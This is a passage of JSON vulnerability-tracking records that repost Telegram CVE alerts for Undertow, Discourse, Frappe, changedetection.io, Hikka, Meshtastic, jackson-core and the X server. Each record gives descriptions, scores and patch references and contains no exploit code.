https://access.redhat.com/errata/RHSA-2024:4884\n12. https://access.redhat.com/errata/RHSA-2025:4226\n13. https://access.redhat.com/errata/RHSA-2025:9583\n14. https://access.redhat.com/security/cve/CVE-2024-1635\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2264928", "creation_timestamp": "2025-06-25T00:49:28.000000Z"}, {"uuid": "fa574333-6c3a-442a-aa23-62fb21320233", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1675", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19413", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1635\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This vulnerability impacts a server that supports the wildfly-http-client protocol. Whenever a malicious user opens and closes a connection with the HTTP port of the server and then closes the connection immediately, the server will end with both memory and open file limits exhausted at some point, depending on the amount of memory available. \n\nAt HTTP upgrade to remoting, the WriteTimeoutStreamSinkConduit leaks connections if RemotingConnection is closed by Remoting ServerConnectionOpenListener. Because the remoting connection originates in Undertow as part of the HTTP upgrade, there is an external layer to the remoting connection. This connection is unaware of the outermost layer when closing the connection during the connection opening procedure. Hence, the Undertow WriteTimeoutStreamSinkConduit is not notified of the closed connection in this scenario. Because WriteTimeoutStreamSinkConduit creates a timeout task, the whole dependency tree leaks via that task, which is added to XNIO WorkerThread. So, the workerThread points to the Undertow conduit, which contains the connections and causes the leak.\n\ud83d\udccf Published: 2024-02-19T21:23:14.496Z\n\ud83d\udccf Modified: 2025-06-25T00:32:58.709Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1674\n2. https://access.redhat.com/errata/RHSA-2024:1675\n3. https://access.redhat.com/errata/RHSA-2024:1676\n4. https://access.redhat.com/errata/RHSA-2024:1677\n5. https://access.redhat.com/errata/RHSA-2024:1860\n6. https://access.redhat.com/errata/RHSA-2024:1861\n7. https://access.redhat.com/errata/RHSA-2024:1862\n8. https://access.redhat.com/errata/RHSA-2024:1864\n9. https://access.redhat.com/errata/RHSA-2024:1866\n10. https://access.redhat.com/errata/RHSA-2024:3354\n11. https://access.redhat.com/errata/RHSA-2024:4884\n12. https://access.redhat.com/errata/RHSA-2025:4226\n13. https://access.redhat.com/errata/RHSA-2025:9583\n14. https://access.redhat.com/security/cve/CVE-2024-1635\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2264928", "creation_timestamp": "2025-06-25T00:49:28.000000Z"}, {"uuid": "582ac946-0967-44a1-a1f2-557f19ca09c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1864", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19413", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1635\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This vulnerability impacts a server that supports the wildfly-http-client protocol. Whenever a malicious user opens and closes a connection with the HTTP port of the server and then closes the connection immediately, the server will end with both memory and open file limits exhausted at some point, depending on the amount of memory available. \n\nAt HTTP upgrade to remoting, the WriteTimeoutStreamSinkConduit leaks connections if RemotingConnection is closed by Remoting ServerConnectionOpenListener. Because the remoting connection originates in Undertow as part of the HTTP upgrade, there is an external layer to the remoting connection. This connection is unaware of the outermost layer when closing the connection during the connection opening procedure. Hence, the Undertow WriteTimeoutStreamSinkConduit is not notified of the closed connection in this scenario. Because WriteTimeoutStreamSinkConduit creates a timeout task, the whole dependency tree leaks via that task, which is added to XNIO WorkerThread. So, the workerThread points to the Undertow conduit, which contains the connections and causes the leak.\n\ud83d\udccf Published: 2024-02-19T21:23:14.496Z\n\ud83d\udccf Modified: 2025-06-25T00:32:58.709Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1674\n2. https://access.redhat.com/errata/RHSA-2024:1675\n3. https://access.redhat.com/errata/RHSA-2024:1676\n4. https://access.redhat.com/errata/RHSA-2024:1677\n5. https://access.redhat.com/errata/RHSA-2024:1860\n6. https://access.redhat.com/errata/RHSA-2024:1861\n7. https://access.redhat.com/errata/RHSA-2024:1862\n8. https://access.redhat.com/errata/RHSA-2024:1864\n9. https://access.redhat.com/errata/RHSA-2024:1866\n10. https://access.redhat.com/errata/RHSA-2024:3354\n11. https://access.redhat.com/errata/RHSA-2024:4884\n12. https://access.redhat.com/errata/RHSA-2025:4226\n13. https://access.redhat.com/errata/RHSA-2025:9583\n14. https://access.redhat.com/security/cve/CVE-2024-1635\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2264928", "creation_timestamp": "2025-06-25T00:49:28.000000Z"}, {"uuid": "1078d79e-5011-481f-81b5-70030d41ed3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1674", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19413", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1635\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This vulnerability impacts a server that supports the wildfly-http-client protocol. Whenever a malicious user opens and closes a connection with the HTTP port of the server and then closes the connection immediately, the server will end with both memory and open file limits exhausted at some point, depending on the amount of memory available. \n\nAt HTTP upgrade to remoting, the WriteTimeoutStreamSinkConduit leaks connections if RemotingConnection is closed by Remoting ServerConnectionOpenListener. Because the remoting connection originates in Undertow as part of the HTTP upgrade, there is an external layer to the remoting connection. This connection is unaware of the outermost layer when closing the connection during the connection opening procedure. Hence, the Undertow WriteTimeoutStreamSinkConduit is not notified of the closed connection in this scenario. Because WriteTimeoutStreamSinkConduit creates a timeout task, the whole dependency tree leaks via that task, which is added to XNIO WorkerThread. So, the workerThread points to the Undertow conduit, which contains the connections and causes the leak.\n\ud83d\udccf Published: 2024-02-19T21:23:14.496Z\n\ud83d\udccf Modified: 2025-06-25T00:32:58.709Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1674\n2. https://access.redhat.com/errata/RHSA-2024:1675\n3. https://access.redhat.com/errata/RHSA-2024:1676\n4. https://access.redhat.com/errata/RHSA-2024:1677\n5. https://access.redhat.com/errata/RHSA-2024:1860\n6. https://access.redhat.com/errata/RHSA-2024:1861\n7. https://access.redhat.com/errata/RHSA-2024:1862\n8. https://access.redhat.com/errata/RHSA-2024:1864\n9. https://access.redhat.com/errata/RHSA-2024:1866\n10. https://access.redhat.com/errata/RHSA-2024:3354\n11. https://access.redhat.com/errata/RHSA-2024:4884\n12. https://access.redhat.com/errata/RHSA-2025:4226\n13. https://access.redhat.com/errata/RHSA-2025:9583\n14. https://access.redhat.com/security/cve/CVE-2024-1635\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2264928", "creation_timestamp": "2025-06-25T00:49:28.000000Z"}, {"uuid": "31a9752a-533f-481b-af48-206022c9032a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-79QW-R73R-69GF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19464", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49845\n\ud83d\udd25 CVSS Score: 6.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: Discourse is an open-source discussion platform. The visibility of posts typed `whisper` is controlled via the `whispers_allowed_groups` site setting. Only users that belong to groups specified in the site setting are allowed to view posts typed `whisper`. However, it has been discovered that users of versions prior to 3.4.6 on the `stable` branch and prior to 3.5.0.beta8-dev on the `tests-passed` branch can continue to see their own whispers even after losing visibility of posts typed `whisper`. This issue is patched in versions 3.4.6 and 3.5.0.beta8-dev. No known workarounds are available.\n\ud83d\udccf Published: 2025-06-25T15:39:01.328Z\n\ud83d\udccf Modified: 2025-06-25T15:39:01.328Z\n\ud83d\udd17 References:\n1. https://github.com/discourse/discourse/security/advisories/GHSA-79qw-r73r-69gf", "creation_timestamp": "2025-06-25T15:52:10.000000Z"}, {"uuid": "f188a44c-01c8-41c6-8487-8b53cfd155ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HV29-66QG-2V6P", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19978", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52896\n\ud83d\udd25 CVSS Score: 8.6 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: Frappe is a full-stack web application framework. Prior to versions 14.94.2 and 15.57.0, authenticated users could upload carefully crafted malicious files via Data Import, leading to cross-site scripting (XSS). This issue has been patched in versions 14.94.2 and 15.57.0. There are no workarounds for this issue other than upgrading.\n\ud83d\udccf Published: 2025-06-30T17:12:50.590Z\n\ud83d\udccf Modified: 2025-06-30T20:39:38.755Z\n\ud83d\udd17 References:\n1. https://github.com/frappe/frappe/security/advisories/GHSA-hv29-66qg-2v6p\n2. https://github.com/frappe/frappe/pull/31483\n3. https://github.com/frappe/frappe/commit/152fd09de5bca16b8d299d715a1f5df6fca3866f\n4. https://github.com/frappe/frappe/commit/f11c53d4df745b58bd1c1c08e1634a2f5a55322a", "creation_timestamp": "2025-06-30T21:09:26.000000Z"}, {"uuid": "07d688f8-01cf-4787-87ff-c4cf2b2df70c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HWPG-X5HW-VPV9", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19386", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52558\n\ud83d\udd25 CVSS Score: 7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:N/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: changedetection.io is a free open source web page change detection, website watcher, restock monitor and notification service. Prior to version 0.50.4, errors in filters from website page change detection watches were not being filtered resulting in a cross-site scripting (XSS) vulnerability. This issue has been patched in version 0.50.4\n\ud83d\udccf Published: 2025-06-23T20:52:24.343Z\n\ud83d\udccf Modified: 2025-06-24T17:18:38.374Z\n\ud83d\udd17 References:\n1. https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-hwpg-x5hw-vpv9\n2. https://github.com/dgtlmoon/changedetection.io/commit/3d5a544ea674cfce517adcd498877a8d760d0931", "creation_timestamp": "2025-06-24T17:49:02.000000Z"}, {"uuid": "dffacb97-5e4d-4b5e-9a19-d606fb87eb2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7X3C-335V-WXJJ", "type": "exploited", "source": "https://t.me/DarkWebInformer_CVEAlerts/19399", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52572\n\ud83d\udd25 CVSS Score: 10 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: Hikka, a Telegram userbot, has vulnerability affects all users on all versions of Hikka. Two scenarios are possible. 1. Web interface does not have an authenticated session: attacker can use his own Telegram account to gain RCE to the server by authorizing in the dangling web interface. 2. Web interface does have an authenticated session: due to insufficient warning in the authentication message, users were tempted to click \"Allow\" in the \"Allow web application ops\" menu. This gave an attacker access not only to remote code execution, but also to Telegram accounts of owners. Scenario number 2 is known to have been exploited in the wild. No known patches are available, but some workarounds are available. Use `--no-web` flag and do not start userbot without it; after authorizing in the web interface, close the port on the server and/or start the userbot with `--no-web` flag; and do not click \"Allow\" in your helper bot unless it is your explicit action that needs to be allowed.\n\ud83d\udccf Published: 2025-06-24T20:10:18.861Z\n\ud83d\udccf Modified: 2025-06-24T20:10:18.861Z\n\ud83d\udd17 References:\n1. https://github.com/hikariatama/Hikka/security/advisories/GHSA-7x3c-335v-wxjj\n2. https://t.me/bbcode/9", "creation_timestamp": "2025-06-24T20:47:53.000000Z"}, {"uuid": "03bb05c2-fa4b-4143-b802-649a31bd0213", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H4RG-G6F3-GHH7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19398", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52883\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\ud83d\udd39 Description: Meshtastic-Android is an Android application for the mesh radio software Meshtastic. Prior to version 2.5.21, an attacker is able to send an unencrypted direct message to a victim impersonating any other node of the mesh. This message will be displayed in the same chat that the victim normally communicates with the other node and it will appear as using PKC, while it is not. This means that the victim will be provided with a false sense of security due to the green padlock displayed when using PKC and they'll read the attacker's message as legitimate. Version 2.5.21 contains a patch for the issue. It is suggested to implement a stricter control on whether a message has been received using PKC or using the shared Meshtastic channel key. Moreover, instead of showing no green padlock icon in the chat with no PKC, consider using an explicit indicator like, for example, the yellow half-open padlock displayed when in HAM mode. This remediation, however, applies to the client applications rather than the Meshtastic firmware.\n\ud83d\udccf Published: 2025-06-24T20:12:59.904Z\n\ud83d\udccf Modified: 2025-06-24T20:12:59.904Z\n\ud83d\udd17 References:\n1. https://github.com/meshtastic/Meshtastic-Android/security/advisories/GHSA-h4rg-g6f3-ghh7\n2. https://github.com/meshtastic/Meshtastic-Android/pull/1720", "creation_timestamp": "2025-06-24T20:47:49.000000Z"}, {"uuid": "b56277d0-d7db-429c-956d-3a9245467b8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PFCQ-4GJR-6GJM", "type": "seen", "source": "Telegram/n2iRBZnq9E7ZcL0orkF_wrY_jYuWJ0gfdHv4rT79OW1qv3c", "content": "", "creation_timestamp": "2026-04-22T23:20:31.000000Z"}, {"uuid": "8b27e7cb-06a7-465f-b0b5-017b26981af6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-44C3-XJFP-3JRH", "type": "seen", "source": "Telegram/n2iRBZnq9E7ZcL0orkF_wrY_jYuWJ0gfdHv4rT79OW1qv3c", "content": "", "creation_timestamp": "2026-04-22T23:20:31.000000Z"}, {"uuid": "242970aa-c667-4171-9c92-d1d37bf5370e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9304", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19185", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49175\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the X Rendering extension's handling of animated cursors. If a client provides no cursors, the server assumes at least one is present, leading to an out-of-bounds read and potential crash.\n\ud83d\udccf Published: 2025-06-17T14:39:39.428Z\n\ud83d\udccf Modified: 2025-06-23T06:33:16.764Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:9303\n2. https://access.redhat.com/errata/RHSA-2025:9304\n3. https://access.redhat.com/errata/RHSA-2025:9305\n4. https://access.redhat.com/errata/RHSA-2025:9306\n5. https://access.redhat.com/security/cve/CVE-2025-49175\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2369947", "creation_timestamp": "2025-06-23T06:45:55.000000Z"}, {"uuid": "0d6b55c3-c455-42ce-b1ee-d5abf2afa0c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G24F-MGC3-JWWC", "type": "seen", "source": "Telegram/n2iRBZnq9E7ZcL0orkF_wrY_jYuWJ0gfdHv4rT79OW1qv3c", "content": "", "creation_timestamp": "2026-04-22T23:20:31.000000Z"}, {"uuid": "ac9f2739-ca13-4c4c-b35b-57abfb2e3111", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7922-X7CF-J54X", "type": "seen", "source": "Telegram/n2iRBZnq9E7ZcL0orkF_wrY_jYuWJ0gfdHv4rT79OW1qv3c", "content": "", "creation_timestamp": "2026-04-22T23:20:31.000000Z"}, {"uuid": "03319f3a-1d70-49fa-9b07-f7b11a46e5fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2HX3-VP6R-MG3F", "type": "seen", "source": "Telegram/n2iRBZnq9E7ZcL0orkF_wrY_jYuWJ0gfdHv4rT79OW1qv3c", "content": "", "creation_timestamp": "2026-04-22T23:20:31.000000Z"}, {"uuid": "053574cc-0464-4206-afc3-cd618e85126f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1861", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19413", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1635\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This vulnerability impacts a server that supports the wildfly-http-client protocol. Whenever a malicious user opens and closes a connection with the HTTP port of the server and then closes the connection immediately, the server will end with both memory and open file limits exhausted at some point, depending on the amount of memory available. \n\nAt HTTP upgrade to remoting, the WriteTimeoutStreamSinkConduit leaks connections if RemotingConnection is closed by Remoting ServerConnectionOpenListener. Because the remoting connection originates in Undertow as part of the HTTP upgrade, there is an external layer to the remoting connection. This connection is unaware of the outermost layer when closing the connection during the connection opening procedure. Hence, the Undertow WriteTimeoutStreamSinkConduit is not notified of the closed connection in this scenario. Because WriteTimeoutStreamSinkConduit creates a timeout task, the whole dependency tree leaks via that task, which is added to XNIO WorkerThread. So, the workerThread points to the Undertow conduit, which contains the connections and causes the leak.\n\ud83d\udccf Published: 2024-02-19T21:23:14.496Z\n\ud83d\udccf Modified: 2025-06-25T00:32:58.709Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1674\n2. https://access.redhat.com/errata/RHSA-2024:1675\n3. https://access.redhat.com/errata/RHSA-2024:1676\n4. https://access.redhat.com/errata/RHSA-2024:1677\n5. https://access.redhat.com/errata/RHSA-2024:1860\n6. https://access.redhat.com/errata/RHSA-2024:1861\n7. https://access.redhat.com/errata/RHSA-2024:1862\n8. https://access.redhat.com/errata/RHSA-2024:1864\n9. https://access.redhat.com/errata/RHSA-2024:1866\n10. https://access.redhat.com/errata/RHSA-2024:3354\n11. https://access.redhat.com/errata/RHSA-2024:4884\n12. https://access.redhat.com/errata/RHSA-2025:4226\n13. https://access.redhat.com/errata/RHSA-2025:9583\n14. https://access.redhat.com/security/cve/CVE-2024-1635\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2264928", "creation_timestamp": "2025-06-25T00:49:28.000000Z"}, {"uuid": "b316efbb-d903-4a03-9f29-1f5b34fdc847", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1862", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19413", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1635\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This vulnerability impacts a server that supports the wildfly-http-client protocol. Whenever a malicious user opens and closes a connection with the HTTP port of the server and then closes the connection immediately, the server will end with both memory and open file limits exhausted at some point, depending on the amount of memory available. \n\nAt HTTP upgrade to remoting, the WriteTimeoutStreamSinkConduit leaks connections if RemotingConnection is closed by Remoting ServerConnectionOpenListener. Because the remoting connection originates in Undertow as part of the HTTP upgrade, there is an external layer to the remoting connection. This connection is unaware of the outermost layer when closing the connection during the connection opening procedure. Hence, the Undertow WriteTimeoutStreamSinkConduit is not notified of the closed connection in this scenario. Because WriteTimeoutStreamSinkConduit creates a timeout task, the whole dependency tree leaks via that task, which is added to XNIO WorkerThread. So, the workerThread points to the Undertow conduit, which contains the connections and causes the leak.\n\ud83d\udccf Published: 2024-02-19T21:23:14.496Z\n\ud83d\udccf Modified: 2025-06-25T00:32:58.709Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1674\n2. https://access.redhat.com/errata/RHSA-2024:1675\n3. https://access.redhat.com/errata/RHSA-2024:1676\n4. https://access.redhat.com/errata/RHSA-2024:1677\n5. https://access.redhat.com/errata/RHSA-2024:1860\n6. https://access.redhat.com/errata/RHSA-2024:1861\n7. https://access.redhat.com/errata/RHSA-2024:1862\n8. https://access.redhat.com/errata/RHSA-2024:1864\n9. https://access.redhat.com/errata/RHSA-2024:1866\n10. https://access.redhat.com/errata/RHSA-2024:3354\n11. https://access.redhat.com/errata/RHSA-2024:4884\n12. https://access.redhat.com/errata/RHSA-2025:4226\n13. https://access.redhat.com/errata/RHSA-2025:9583\n14. https://access.redhat.com/security/cve/CVE-2024-1635\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2264928", "creation_timestamp": "2025-06-25T00:49:28.000000Z"}, {"uuid": "dd31791d-5be4-403a-8296-29982f5160bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H46C-H94J-95F3", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19492", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52999\n\ud83d\udd25 CVSS Score: 8.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: jackson-core contains core low-level incremental (\"streaming\") parser and generator abstractions used by Jackson Data Processor. In versions prior to 2.15.0, if a user parses an input file and it has deeply nested data, Jackson could end up throwing a StackoverflowError if the depth is particularly large. jackson-core 2.15.0 contains a configurable limit for how deep Jackson will traverse in an input document, defaulting to an allowable depth of 1000. jackson-core will throw a StreamConstraintsException if the limit is reached. jackson-databind also benefits from this change because it uses jackson-core to parse JSON inputs. As a workaround, users should avoid parsing input files from untrusted sources.\n\ud83d\udccf Published: 2025-06-25T17:02:57.428Z\n\ud83d\udccf Modified: 2025-06-25T17:02:57.428Z\n\ud83d\udd17 References:\n1. https://github.com/FasterXML/jackson-core/security/advisories/GHSA-h46c-h94j-95f3\n2. https://github.com/FasterXML/jackson-core/pull/943", "creation_timestamp": "2025-06-25T18:06:23.000000Z"}, {"uuid": "67023f03-f686-400a-8760-e05b2dd53944", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1677", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19413", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1635\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This vulnerability impacts a server that supports the wildfly-http-client protocol. Whenever a malicious user opens and closes a connection with the HTTP port of the server and then closes the connection immediately, the server will end with both memory and open file limits exhausted at some point, depending on the amount of memory available. \n\nAt HTTP upgrade to remoting, the WriteTimeoutStreamSinkConduit leaks connections if RemotingConnection is closed by Remoting ServerConnectionOpenListener. Because the remoting connection originates in Undertow as part of the HTTP upgrade, there is an external layer to the remoting connection. This connection is unaware of the outermost layer when closing the connection during the connection opening procedure. Hence, the Undertow WriteTimeoutStreamSinkConduit is not notified of the closed connection in this scenario. Because WriteTimeoutStreamSinkConduit creates a timeout task, the whole dependency tree leaks via that task, which is added to XNIO WorkerThread. So, the workerThread points to the Undertow conduit, which contains the connections and causes the leak.\n\ud83d\udccf Published: 2024-02-19T21:23:14.496Z\n\ud83d\udccf Modified: 2025-06-25T00:32:58.709Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1674\n2. https://access.redhat.com/errata/RHSA-2024:1675\n3. https://access.redhat.com/errata/RHSA-2024:1676\n4. https://access.redhat.com/errata/RHSA-2024:1677\n5. https://access.redhat.com/errata/RHSA-2024:1860\n6. https://access.redhat.com/errata/RHSA-2024:1861\n7. https://access.redhat.com/errata/RHSA-2024:1862\n8. https://access.redhat.com/errata/RHSA-2024:1864\n9. https://access.redhat.com/errata/RHSA-2024:1866\n10. https://access.redhat.com/errata/RHSA-2024:3354\n11. https://access.redhat.com/errata/RHSA-2024:4884\n12. https://access.redhat.com/errata/RHSA-2025:4226\n13. https://access.redhat.com/errata/RHSA-2025:9583\n14. https://access.redhat.com/security/cve/CVE-2024-1635\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2264928", "creation_timestamp": "2025-06-25T00:49:28.000000Z"}, {"uuid": "38e92c44-b225-465c-ad32-2f5e25263105", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4884", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19413", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1635\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This vulnerability impacts a server that supports the wildfly-http-client protocol. Whenever a malicious user opens and closes a connection with the HTTP port of the server and then closes the connection immediately, the server will end with both memory and open file limits exhausted at some point, depending on the amount of memory available. \n\nAt HTTP upgrade to remoting, the WriteTimeoutStreamSinkConduit leaks connections if RemotingConnection is closed by Remoting ServerConnectionOpenListener. Because the remoting connection originates in Undertow as part of the HTTP upgrade, there is an external layer to the remoting connection. This connection is unaware of the outermost layer when closing the connection during the connection opening procedure. Hence, the Undertow WriteTimeoutStreamSinkConduit is not notified of the closed connection in this scenario. Because WriteTimeoutStreamSinkConduit creates a timeout task, the whole dependency tree leaks via that task, which is added to XNIO WorkerThread. So, the workerThread points to the Undertow conduit, which contains the connections and causes the leak.\n\ud83d\udccf Published: 2024-02-19T21:23:14.496Z\n\ud83d\udccf Modified: 2025-06-25T00:32:58.709Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1674\n2. https://access.redhat.com/errata/RHSA-2024:1675\n3. https://access.redhat.com/errata/RHSA-2024:1676\n4. https://access.redhat.com/errata/RHSA-2024:1677\n5. https://access.redhat.com/errata/RHSA-2024:1860\n6. https://access.redhat.com/errata/RHSA-2024:1861\n7. https://access.redhat.com/errata/RHSA-2024:1862\n8. https://access.redhat.com/errata/RHSA-2024:1864\n9. https://access.redhat.com/errata/RHSA-2024:1866\n10. https://access.redhat.com/errata/RHSA-2024:3354\n11. https://access.redhat.com/errata/RHSA-2024:4884\n12. https://access.redhat.com/errata/RHSA-2025:4226\n13. https://access.redhat.com/errata/RHSA-2025:9583\n14. https://access.redhat.com/security/cve/CVE-2024-1635\n15. 